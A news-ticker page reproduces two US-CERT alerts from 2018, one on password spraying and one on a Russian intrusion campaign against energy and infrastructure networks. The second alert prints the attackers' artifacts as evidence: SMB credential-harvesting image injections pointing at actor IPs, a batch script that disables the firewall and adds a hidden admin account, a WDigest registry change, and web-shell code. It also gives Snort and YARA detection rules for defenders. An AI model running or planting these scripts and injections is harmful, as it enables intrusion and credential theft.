Ticker Presse und Sicherheit
US-CERT Alerts- 03/27/18 TA18-086A: Brute Force Attacks Conducted by Cyber Actors
Original release date: March 27, 2018 | Last revised: March 28, 2018
Systems Affected
Networked systems
Overview
According to information derived from FBI investigations, malicious cyber actors are increasingly using a style of brute force attack known as password spraying against organizations in the United States and abroad.On February 2018, the Department of Justice in the Southern District of New York, indicted nine Iranian nationals, who were associated with the Mabna Institute, for computer intrusion offenses related to activity described in this report. The techniques and activity described herein, while characteristic of Mabna actors, are not limited solely to use by this group.The Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) are releasing this Alert to provide further information on this activity.
Description
In a traditional brute-force attack, a malicious actor attempts to gain unauthorized access to a single account by guessing the password. This can quickly result in a targeted account getting locked-out, as commonly used account-lockout policies allow three to five bad attempts during a set period of time. During a password-spray attack (also known as the “low-and-slow” method), the malicious actor attempts a single password against many accounts before moving on to attempt a second password, and so on. This technique allows the actor to remain undetected by avoiding rapid or frequent account lockouts.Password spray campaigns typically target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols. An actor may target this specific protocol because federated authentication can help mask malicious traffic. Additionally, by targeting SSO applications, malicious actors hope to maximize access to intellectual property during a successful compromise. Email applications are also targeted. In those instances, malicious actors would have the ability to utilize inbox synchronization to (1) obtain unauthorized access to the organization's email directly from the cloud, (2) subsequently download user mail to locally stored email files, (3) identify the entire company’s email address list, and/or (4) surreptitiously implements inbox rules for the forwarding of sent and received messages.Technical DetailsTraditional tactics, techniques, and procedures (TTPs) for conducting the password-spray attacks are as follows:Using social engineering tactics to perform online research (i.e., Google search, LinkedIn, etc.) to identify target organizations and specific user accounts for initial password sprayUsing easy-to-guess passwords (e.g., “Winter2018”, “Password123!”) and publicly available tools, execute a password spray attack against targeted accounts by utilizing the identified SSO or web-based application and federated authentication methodLeveraging the initial group of compromised accounts, downloading the Global Address List (GAL) from a target’s email client, and performing a larger password spray against legitimate accountsUsing the compromised access, attempting to expand laterally (e.g., via Remote Desktop Protocol) within the network, and performing mass data exfiltration using File Transfer Protocol tools such as FileZillaIndicators of a password spray attack include:A massive spike in attempted logons against the enterprise SSO portal or web-based application;Using automated tools, malicious actors attempt thousands of logons, in rapid succession, against multiple user accounts at a victim enterprise, originating from a single IP address and computer (e.g., a common User Agent String).Attacks have been seen to run for over two hours.Employee logons from IP addresses resolving to locations inconsistent with their normal locations.Typical Victim EnvironmentThe vast majority of known password spray victims share some of the following characteristics [1][2]:Use SSO or web-based applications with federated authentication methodLack multifactor authentication (MFA)Allow easy-to-guess passwords (e.g., “Winter2018”, “Password123!”)Use inbox synchronization, allowing email to be pulled from cloud environments to remote devicesAllow email forwarding to be setup at the user levelLimited logging setup creating difficulty during post-event investigations
Impact
A successful network intrusion can have severe impacts, particularly if the compromise becomes public and sensitive information is exposed. Possible impacts include:Temporary or permanent loss of sensitive or proprietary information;Disruption to regular operations;Financial losses incurred to restore systems and files; andPotential harm to an organization’s reputation.
Solution
Recommended MitigationsTo help deter this style of attack, the following steps should be taken:Enable MFA and review MFA settings to ensure coverage over all active, internet facing protocols.Review password policies to ensure they align with the latest NIST guidelines [3] and deter the use of easy-to-guess passwords.Review IT helpdesk password management related to initial passwords, password resets for user lockouts, and shared accounts. IT helpdesk password procedures may not align to company policy, creating an exploitable security gap.Many companies offer additional assistance and tools the can help detect and prevent password spray attacks, such as the Microsoft blog released on March 5, 2018. [4]Reporting NoticeThe FBI encourages recipients of this document to report information concerning suspicious or criminal activity to their local FBI field office or the FBI’s 24/7 Cyber Watch (CyWatch). Field office contacts can be identified at www.fbi.gov/contact-us/field. CyWatch can be contacted by phone at (855) 292-3937 or by e-mail at CyWatch@ic.fbi.gov. When available, each report submitted should include the date, time, location, type of activity, number of people, and type of equipment used for the activity, the name of the submitting company or organization, and a designated point of contact. Press inquiries should be directed to the FBI’s national Press Office at npo@ic.fbi.gov or (202) 324-3691.
References
[1] NCCIC/US-CERT Tip ST04-002 – Choosing and Protecting Passwords
[2] NCCIC/US-CERT Tip ST05-12 – Supplementing Passwords
[3] NIST Special Publication 800-63 – Digital Identity Guidelines
[4] Microsoft. Azure AD and ADFS best practices: Defending against password spray attacks
Revision History
March 27, 2018: Initial Version
This product is provided subject to this Notification and this Privacy & Use policy.
vollständige Meldung - 03/15/18 TA18-074A: Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors
Original release date: March 15, 2018 | Last revised: March 16, 2018
Systems Affected
Domain ControllersFile ServersEmail Servers
Overview
This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides information on Russian government actions targeting U.S. Government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors. It also contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by Russian government cyber actors on compromised victim networks. DHS and FBI produced this alert to educate network defenders to enhance their ability to identify and reduce exposure to malicious activity.DHS and FBI characterize this activity as a multi-stage intrusion campaign by Russian government cyber actors who targeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote access into energy sector networks. After obtaining access, the Russian government cyber actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).For a downloadable copy of IOC packages and associated files, see:TA18-074A_TLP_WHITE.csvTA18-074A_TLP_WHITE.stix.xmlMIFR-10127623_TLP_WHITE.pdfMIFR-10127623_TLP_WHITE_stix.xmlMIFR-10128327_TLP_WHITE.pdfMIFR-10128327_TLP_WHITE_stix.xmlMIFR-10128336_TLP_WHITE.pdfMIFR-10128336_TLP_WHITE_stix.xmlMIFR-10128830_TLP_WHITE.pdfMIFR-10128830_TLP_WHITE_stix.xmlMIFR-10128883_TLP_WHITE.pdfMIFR-10128883_TLP_WHITE_stix.xmlMIFR-10135300_TLP_WHITE.pdfMIFR-10135300_TLP_WHITE_stix.xmlContact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical assistance.
Description
Since at least March 2016, Russian government cyber actors—hereafter referred to as “threat actors”—targeted government entities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.Analysis by DHS and FBI, resulted in the identification of distinct indicators and behaviors related to this activity. Of note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign. [1]This campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral organizations such as trusted third-party suppliers with less secure networks, referred to as “staging targets” throughout this alert. The threat actors used the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims. NCCIC and FBI judge the ultimate objective of the actors is to compromise organizational networks, also referred to as the “intended target.”Technical DetailsThe threat actors in this campaign employed a variety of TTPs, includingspear-phishing emails (from compromised legitimate account),watering-hole domains,credential gathering,open-source and network reconnaissance,host-based exploitation, andtargeting industrial control system (ICS) infrastructure.Using Cyber Kill Chain for AnalysisDHS used the Lockheed-Martin Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of the model include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on the objective. This section will provide a high-level overview of threat actors’ activities within this framework. Stage 1: ReconnaissanceThe threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity. Staging targets held preexisting relationships with many of the intended targets. DHS analysis identified the threat actors accessing publicly available information hosted by organization-monitored networks during the reconnaissance phase. Based on forensic analysis, DHS assesses the threat actors sought information on network and organizational design and control system capabilities within organizations. These tactics are commonly used to collect the information needed for targeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may appear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a small photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background.Analysis also revealed that the threat actors used compromised staging targets to download the source code for several intended targets’ websites. Additionally, the threat actors attempted to remotely access infrastructure such as corporate web-based email and virtual private network (VPN) connections. Stage 2: WeaponizationSpear-Phishing Email TTPs Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]//<remote IP address>/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.) After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication. [2] Use of Watering Hole Domains One of the threat actors’ primary uses for staging targets was to develop watering holes. Threat actors compromised the infrastructure of trusted organizations to reach intended targets. [3] Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure. Although these watering holes may host legitimate content developed by reputable organizations, the threat actors altered websites to contain and reference malicious content. The threat actors used legitimate credentials to access and directly modify the website content. The threat actors modified these websites by altering JavaScript and PHP files to request a file icon using SMB from an IP address controlled by the threat actors. This request accomplishes a similar technique observed in the spear-phishing documents for credential harvesting. In one instance, the threat actors added a line of code into the file “header.php”, a legitimate PHP file that carried out the redirected traffic. <img src="https://www.us-cert.govfile[:]//62.8.193[.]206/main_logo.png" style="height: 1px; width: 1px;" /> In another instance, the threat actors modified the JavaScript file, “modernizr.js”, a legitimate JavaScript library used by the website to detect various aspects of the user’s browser. The file was modified to contain the contents below: var i = document.createElement("img");i.src = "file[:]//184.154.150[.]66/ame_icon.png";i.width = 3;i.height=2; Stage 3: Delivery When compromising staging target networks, the threat actors used spear-phishing emails that differed from previously reported TTPs. The spear-phishing emails used a generic contract agreement theme (with the subject line “AGREEMENT & Confidential”) and contained a generic PDF document titled ``document.pdf. (Note the inclusion of two single back ticks at the beginning of the attachment name.) The PDF was not malicious and did not contain any active code. The document contained a shortened URL that, when clicked, led users to a website that prompted the user for email address and password. (Note: no code within the PDF initiated a download.)In previous reporting, DHS and FBI noted that all of these spear-phishing emails referred to control systems or process control systems. The threat actors continued using these themes specifically against intended target organizations. Email messages included references to common industrial control equipment and protocols. The emails used malicious Microsoft Word attachments that appeared to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel, and invitations and policy documents to entice the user to open the attachment. Stage 4: Exploitation The threat actors used distinct and unusual TTPs in the phishing campaign directed at staging targets. Emails contained successive redirects to http://bit[.]ly/2m0x8IH link, which redirected to http://tinyurl[.]com/h3sdqck link, which redirected to the ultimate destination of http://imageliners[.]com/nitel. The imageliner[.]com website contained input fields for an email address and password mimicking a login page for a website.When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a “file://” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. This connection is made to a command and control (C2) server—either a server owned by the threat actors or that of a victim. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. (Note: a file transfer is not necessary for a loss of credential information.) Symantec’s report associates this behavior to the Dragonfly threat actors in this campaign. [1] Stage 5: Installation The threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication was not used. [4] To maintain persistence, the threat actors created local administrator accounts within staging targets and placed malicious files within intended targets. Establishing Local Accounts The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial script “symantec_help.jsp” contained a one-line reference to a malicious script designed to create the local administrator account and manipulate the firewall for remote access. The script was located in “C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\”. Contents of symantec_help.jsp ____________________________________________________________________________________________________________________<% Runtime.getRuntime().exec("cmd /C \"" + System.getProperty("user.dir") + "\\..\\webapps\\ROOT\\<enu.cmd>\""); %>____________________________________________________________________________________________________________________The script “enu.cmd” created an administrator account, disabled the host-based firewall, and globally opened port 3389 for Remote Desktop Protocol (RDP) access. The script then attempted to add the newly created account to the administrators group to gain elevated privileges. This script contained hard-coded values for the group name “administrator” in Spanish, Italian, German, French, and English. Contents of enu.cmd ____________________________________________________________________________________________________________________netsh firewall set opmode disablenetsh advfirewall set allprofiles state offreg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List" /v 3389:TCP /t REG_SZ /d "3389:TCP:*:Enabled:Remote Desktop" /freg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List" /v 3389:TCP /t REG_SZ /d "3389:TCP:*:Enabled:Remote Desktop" /freg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /freg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /freg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core" /v EnableConcurrentSessions /t REG_DWORD /d 1 /freg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v EnableConcurrentSessions /t REG_DWORD /d 1 /freg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AllowMultipleTSSessions /t REG_DWORD /d 1 /freg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v MaxInstanceCount /t REG_DWORD /d 100 /fnet user MS_BACKUP <Redacted_Password> /addnet localgroup Administrators /add MS_BACKUPnet localgroup Administradores /add MS_BACKUPnet localgroup Amministratori /add MS_BACKUPnet localgroup Administratoren /add MS_BACKUPnet localgroup Administrateurs /add MS_BACKUPnet localgroup "Remote Desktop Users" /add MS_BACKUPnet user MS_BACKUP /expires:neverreg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v MS_BACKUP /t REG_DWORD /d 0 /freg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v dontdisplaylastusername /t REG_DWORD /d 1 /freg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /fsc config termservice start= autonet start termservice____________________________________________________________________________________________________________________DHS observed the threat actors using this and similar scripts to create multiple accounts within staging target networks. Each account created by the threat actors served a specific purpose in their operation. These purposes ranged from the creation of additional accounts to cleanup of activity. DHS and FBI observed the following actions taken after the creation of these local accounts:Account 1: Account 1 was named to mimic backup services of the staging target. This account was created by the malicious script described earlier. The threat actor used this account to conduct open-source reconnaissance and remotely access intended targets.Account 2: Account 1 was used to create Account 2 to impersonate an email administration account. The only observed action was to create Account 3.Account 3: Account 3 was created within the staging victim’s Microsoft Exchange Server. A PowerShell script created this account during an RDP session while the threat actor was authenticated as Account 2. The naming conventions of the created Microsoft Exchange account followed that of the staging target (e.g., first initial concatenated with the last name).Account 4: In the latter stage of the compromise, the threat actor used Account 1 to create Account 4, a local administrator account. Account 4 was then used to delete logs and cover tracks. Scheduled TaskIn addition, the threat actors created a scheduled task named reset, which was designed to automatically log out of their newly created account every eight hours. VPN SoftwareAfter achieving access to staging targets, the threat actors installed tools to carry out operations against intended victims. On one occasion, threat actors installed the free version of FortiClient, which they presumably used as a VPN client to connect to intended target networks. Password Cracking ToolsConsistent with the perceived goal of credential harvesting, the threat actors dropped and executed open source and free tools such as Hydra, SecretsDump, and CrackMapExec. The naming convention and download locations suggest that these files were downloaded directly from publically available locations such as GitHub. Forensic analysis indicates that many of these tools were executed during the timeframe in which the actor was accessing the system. Of note, the threat actors installed Python 2.7 on a compromised host of one staging victim, and a Python script was seen at C:\Users\<Redacted Username>\Desktop\OWAExchange\. Downloader Once inside of an intended target’s network, the threat actor downloaded tools from a remote server. The initial versions of the file names contained .txt extensions and were renamed to the appropriate extension, typically .exe or .zip.In one example, after gaining remote access to the network of an intended victim, the threat actor carried out the following actions:The threat actor connected to 91.183.104[.]150 and downloaded multiple files, specifically the file INST.txt.The files were renamed to new extensions, with INST.txt being renamed INST.exe.The files were executed on the host and then immediately deleted.The execution of INST.exe triggered a download of ntdll.exe, and shortly after, ntdll.exe appeared in the running process list of the compromised system of an intended target.The registry value “ntdll” was added to the “HKEY_USERS\<USER SID>\Software\Microsoft\Windows\CurrentVersion\Run” key. Persistence Through .LNK File ManipulationThe threat actors manipulated LNK files, commonly known as a Microsoft Window’s shortcut file, to repeatedly gather user credentials. Default Windows functionality enables icons to be loaded from a local or remote Windows repository. The threat actors exploited this built-in Windows functionality by setting the icon path to a remote server controller by the actors. When the user browses to the directory, Windows attempts to load the icon and initiate an SMB authentication session. During this process, the active user’s credentials are passed through the attempted SMB connection.Four of the observed LNK files were “SETROUTE.lnk”, “notepad.exe.lnk”, “Document.lnk” and “desktop.ini.lnk”. These names appeared to be contextual, and the threat actor may use a variety of other file names while using this tactic. Two of the remote servers observed in the icon path of these LNK files were 62.8.193[.]206 and 5.153.58[.]45. Below is the parsed content of one of the LNK files:Parsed output for file: desktop.ini.lnkRegistry Modification The threat actor would modify key systems to store plaintext credentials in memory. In one instance, the threat actor executed the following command. reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f Stage 6: Command and ControlThe threat actors commonly created web shells on the intended targets’ publicly accessible email and web servers. The threat actors used three different filenames (“global.aspx, autodiscover.aspx and index.aspx) for two different webshells. The difference between the two groups was the “public string Password” field. Beginning Contents of the Web Shell ____________________________________________________________________________________________________________________<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%><%@ import Namespace="System"%><%@ import Namespace="System.IO"%><%@ import Namespace="System.Diagnostics"%><%@ import Namespace="System.Data"%><%@ import Namespace="System.Management"%><%@ import Namespace="System.Data.OleDb"%><%@ import Namespace="Microsoft.Win32"%><%@ import Namespace="System.Net.Sockets" %><%@ import Namespace="System.Net" %><%@ import Namespace="System.Runtime.InteropServices"%><%@ import Namespace="System.DirectoryServices"%><%@ import Namespace="System.ServiceProcess"%><%@ import Namespace="System.Text.RegularExpressions"%><%@ Import Namespace="System.Threading"%><%@ Import Namespace="System.Data.SqlClient"%><%@ import Namespace="Microsoft.VisualBasic"%><%@ Import Namespace="System.IO.Compression" %><%@ Assembly Name="System.DirectoryServices,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%><%@ Assembly Name="System.Management,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%><%@ Assembly Name="System.ServiceProcess,Version=2.0.0.0,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%><%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><script runat = "server">public string Password = "<REDACTED>";public string z_progname = "z_WebShell";…____________________________________________________________________________________________________________________ Stage 7: Actions on Objectives DHS and FBI identified the threat actors leveraging remote access services and infrastructure such as VPN, RDP, and Outlook Web Access (OWA). The threat actors used the infrastructure of staging targets to connect to several intended targets. Internal Reconnaissance Upon gaining access to intended victims, the threat actors conducted reconnaissance operations within the network. DHS observed the threat actors focusing on identifying and browsing file servers within the intended victim’s network.Once on the intended target’s network, the threat actors used privileged credentials to access the victim’s domain controller typically via RDP. Once on the domain controller, the threat actors used the batch scripts “dc.bat” and “dit.bat” to enumerate hosts, users, and additional information about the environment. The observed outputs (text documents) from these scripts were:admins.txtcompleted_dclist.txtcompleted_trusts.txtcompleted_zone.txtcomps.txtconditional_forwarders.txtdomain_zone.txtenum_zones.txtusers.txtThe threat actors also collected the files “ntds.dit” and the “SYSTEM” registry hive. DHS observed the threat actors compress all of these files into archives named “SYSTEM.zip” and “comps.zip”.The threat actors used Windows’ scheduled task and batch scripts to execute “scr.exe” and collect additional information from hosts on the network. The tool “scr.exe” is a screenshot utility that the threat actor used to capture the screen of systems across the network. The MD5 hash of “scr.exe” matched the MD5 of ScreenUtil, as reported in the Symantec Dragonfly 2.0 report.In at least two instances, the threat actors used batch scripts labeled “pss.bat” and “psc.bat” to run the PsExec tool. Additionally, the threat actors would rename the tool PsExec to “ps.exe”.The batch script (“pss.bat” or “psc.bat”) is executed with domain administrator credentials.The directory “out” is created in the user’s %AppData% folder.PsExec is used to execute “scr.exe” across the network and to collect screenshots of systems in “ip.txt”.The screenshot’s filename is labeled based on the computer name of the host and stored in the target’s C:\Windows\Temp directory with a “.jpg” extension.The screenshot is then copied over to the newly created “out” directory of the system where the batch script was executed.In one instance, DHS observed an “out.zip” file created.DHS observed the threat actors create and modify a text document labeled “ip.txt” which is believed to have contained a list of host information. The threat actors used “ip.txt” as a source of hosts to perform additional reconnaissance efforts. In addition, the text documents “res.txt” and “err.txt” were observed being created as a result of the batch scripts being executed. In one instance, “res.txt” contained output from the Windows’ command “query user” across the network. Using <Username> <Password>Running -s cmd /c query user on <Hostname1>Running -s cmd /c query user on <Hostname2>Running -s cmd /c query user on <Hostname3>USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME<user1> 2 Disc 1+19:34 6/27/2017 12:35 PM An additional batch script named “dirsb.bat” was used to gather folder and file names from hosts on the network.In addition to the batch scripts, the threat actors also used scheduled tasks to collect screenshots with “scr.exe”. In two instances, the scheduled tasks were designed to run the command “C:\Windows\Temp\scr.exe” with the argument “C:\Windows\Temp\scr.jpg”. In another instance, the scheduled task was designed to run with the argument “pss.bat” from the local administrator’s “AppData\Local\Microsoft\” folder.The threat actors commonly executed files out of various directories within the user’s AppData or Downloads folder. Some common directory names wereChromex64,Microsoft_Corporation,NT,Office365,Temp, andUpdate. Targeting of ICS and SCADA InfrastructureIn multiple instances, the threat actors accessed workstations and servers on a corporate network that contained data output from control systems within energy generation facilities. The threat actors accessed files pertaining to ICS or supervisory control and data acquisition (SCADA) systems. Based on DHS analysis of existing compromises, these files were named containing ICS vendor names and ICS reference documents pertaining to the organization (e.g., “SCADA WIRING DIAGRAM.pdf” or “SCADA PANEL LAYOUTS.xlsx”).The threat actors targeted and copied profile and configuration information for accessing ICS systems on the network. DHS observed the threat actors copying Virtual Network Connection (VNC) profiles that contained configuration information on accessing ICS systems. DHS was able to reconstruct screenshot fragments of a Human Machine Interface (HMI) that the threat actors accessed. Cleanup and Cover Tracks In multiple instances, the threat actors created new accounts on the staging targets to perform cleanup operations. The accounts created were used to clear the following Windows event logs: System, Security, Terminal Services, Remote Services, and Audit. The threat actors also removed applications they installed while they were in the network along with any logs produced. For example, the Fortinet client installed at one commercial facility was deleted along with the logs that were produced from its use. Finally, data generated by other accounts used on the systems accessed were deleted.Threat actors cleaned up intended target networks through deleting created screenshots and specific registry keys. Through forensic analysis, DHS determined that the threat actors deleted the registry key associated with terminal server client that tracks connections made to remote systems. The threat actors also deleted all batch scripts, output text documents and any tools they brought into the environment such as “scr.exe”. Detection and ResponseIOCs related to this campaign are provided within the accompanying .csv and .stix files of this alert. DHS and FBI recommend that network administrators review the IP addresses, domain names, file hashes, network signatures, and YARA rules provided, and add the IPs to their watchlists to determine whether malicious activity has been observed within their organization. System owners are also advised to run the YARA tool on any system suspected to have been targeted by these threat actors. Network Signatures and Host-Based RulesThis section contains network signatures and host-based rules that can be used to detect malicious activity associated with threat actor TTPs. Although these network signatures and host-based rules were created using a comprehensive vetting process, the possibility of false positives always remains. Network Signaturesalert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI contains '/aspnet_client/system_web/4_0_30319/update/' (Beacon)"; sid:42000000; rev:1; flow:established,to_server; content:"/aspnet_client/system_web/4_0_30319/update/"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)___________________________________alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI contains '/img/bson021.dat'"; sid:42000001; rev:1; flow:established,to_server; content:"/img/bson021.dat"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)________________________________________alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI contains '/A56WY' (Callback)"; sid:42000002; rev:1; flow:established,to_server; content:"/A56WY"; http_uri; fast_pattern; classtype:bad-unknown; metadata:service http;)_________________________________________alert tcp any any -> any 445 (msg:"SMB Client Request contains 'AME_ICON.PNG' (SMB credential harvesting)"; sid:42000003; rev:1; flow:established,to_server; content:"|FF|SMB|75 00 00 00 00|"; offset:4; depth:9; content:"|08 00 01 00|"; distance:3; content:"|00 5c 5c|"; distance:2; within:3; content:"|5c|AME_ICON.PNG"; distance:7; fast_pattern; classtype:bad-unknown; metadata:service netbios-ssn;)________________________________________alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI OPTIONS contains '/ame_icon.png' (SMB credential harvesting)"; sid:42000004; rev:1; flow:established,to_server; content:"/ame_icon.png"; http_uri; fast_pattern:only; content:"OPTIONS"; nocase; http_method; classtype:bad-unknown; metadata:service http;)_________________________________________alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP Client Header contains 'User-Agent|3a 20|Go-http-client/1.1'"; sid:42000005; rev:1; flow:established,to_server; content:"User-Agent|3a 20|Go-http-client/1.1|0d 0a|Accept-Encoding|3a 20|gzip"; http_header; fast_pattern:only; pcre:"/\.(?:aspx|txt)\?[a-z0-9]{3}=[a-z0-9]{32}&/U"; classtype:bad-unknown; metadata:service http;)__________________________________________alert tcp $EXTERNAL_NET [139,445] -> $HOME_NET any (msg:"SMB Server Traffic contains NTLM-Authenticated SMBv1 Session"; sid:42000006; rev:1; flow:established,to_client; content:"|ff 53 4d 42 72 00 00 00 00 80|"; fast_pattern:only; content:"|05 00|"; distance:23; classtype:bad-unknown; metadata:service netbios-ssn;) YARA RulesThis is a consolidated rule set for malware associated with this activity. These rules were written by NCCIC and include contributions from trusted partners.*/ rule APT_malware_1{meta: description = "inveigh pen testing tools & related artifacts" author = "DHS | NCCIC Code Analysis Team" date = "2017/07/17" hash0 = "61C909D2F625223DB2FB858BBDF42A76" hash1 = "A07AA521E7CAFB360294E56969EDA5D6" hash2 = "BA756DD64C1147515BA2298B6A760260" hash3 = "8943E71A8C73B5E343AA9D2E19002373" hash4 = "04738CA02F59A5CD394998A99FCD9613" hash5 = "038A97B4E2F37F34B255F0643E49FC9D" hash6 = "65A1A73253F04354886F375B59550B46" hash7 = "AA905A3508D9309A93AD5C0EC26EBC9B" hash8 = "5DBEF7BDDAF50624E840CCBCE2816594" hash9 = "722154A36F32BA10E98020A8AD758A7A" hash10 = "4595DBE00A538DF127E0079294C87DA0"strings: $s0 = "file://" $s1 = "/ame_icon.png" $s2 = "184.154.150.66" $s3 = { 87D081F60C67F5086A003315D49A4000F7D6E8EB12000081F7F01BDD21F7DE } $s4 = { 33C42BCB333DC0AD400043C1C61A33C3F7DE33F042C705B5AC400026AF2102 } $s5 = "(g.charCodeAt(c)^l[(l[b]+l[e])%256])" $s6 = "for(b=0;256>b;b++)k[b]=b;for(b=0;256>b;b++)" $s7 = "VXNESWJfSjY3grKEkEkRuZeSvkE=" $s8 = "NlZzSZk=" $s9 = "WlJTb1q5kaxqZaRnser3sw==" $s10 = "for(b=0;256>b;b++)k[b]=b;for(b=0;256>b;b++)" $s11 = "fromCharCode(d.charCodeAt(e)^k[(k[b]+k[h])%256])" $s12 = "ps.exe -accepteula \\%ws% -u %user% -p %pass% -s cmd /c netstat" $s13 = { 22546F6B656E733D312064656C696D733D5C5C222025254920494E20286C6973742E74787429 } $s14 = { 68656C6C2E657865202D6E6F65786974202D657865637574696F6E706F6C69637920627970617373202D636F6D6D616E6420222E202E5C496E76656967682E70 } $s15 = { 476F206275696C642049443A202266626433373937623163313465306531 }//inveigh pentesting tools $s16 = { 24696E76656967682E7374617475735F71756575652E4164642822507265737320616E79206B657920746F2073746F70207265616C2074696D65 }//specific malicious word document PK archive $s17 = { 2F73657474696E67732E786D6CB456616FDB3613FEFE02EF7F10F4798E64C54D06A14ED125F19A225E87C9FD0194485B } $s18 = { 6C732F73657474696E67732E786D6C2E72656C7355540500010076A41275780B0001040000000004000000008D90B94E03311086EBF014D6F4D87B48214471D2 } $s19 = { 8D90B94E03311086EBF014D6F4D87B48214471D210A41450A0E50146EBD943F8923D41C9DBE3A54A240ACA394A240ACA39 } $s20 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 } $s21 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 } $s22 = "5.153.58.45" $s23 = "62.8.193.206" $s24 = "/1/ree_stat/p" $s25 = "/icon.png" $s26 = "/pshare1/icon" $s27 = "/notepad.png" $s28 = "/pic.png" $s29 = "http://bit.ly/2m0x8IH" condition: ($s0 and $s1 or $s2) or ($s3 or $s4) or ($s5 and $s6 or $s7 and $s8 and $s9) or ($s10 and $s11) or ($s12 and $s13) or ($s14) or ($s15) or ($s16) or ($s17) or ($s18) or ($s19) or ($s20) or ($s21) or ($s0 and $s22 or $s24) or ($s0 and $s22 or $s25) or ($s0 and $s23 or $s26) or ($s0 and $s22 or $s27) or ($s0 and $s23 or $s28) or ($s29)} rule APT_malware_2{meta: description = "rule detects malware" author = "other" strings: $api_hash = { 8A 08 84 C9 74 0D 80 C9 60 01 CB C1 E3 01 03 45 10 EB ED } $http_push = "X-mode: push" nocase $http_pop = "X-mode: pop" nocase condition: any of them} rule Query_XML_Code_MAL_DOC_PT_2{meta: name= "Query_XML_Code_MAL_DOC_PT_2" author = "other" strings: $zip_magic = { 50 4b 03 04 } $dir1 = "word/_rels/settings.xml.rels" $bytes = {8c 90 cd 4e eb 30 10 85 d7} 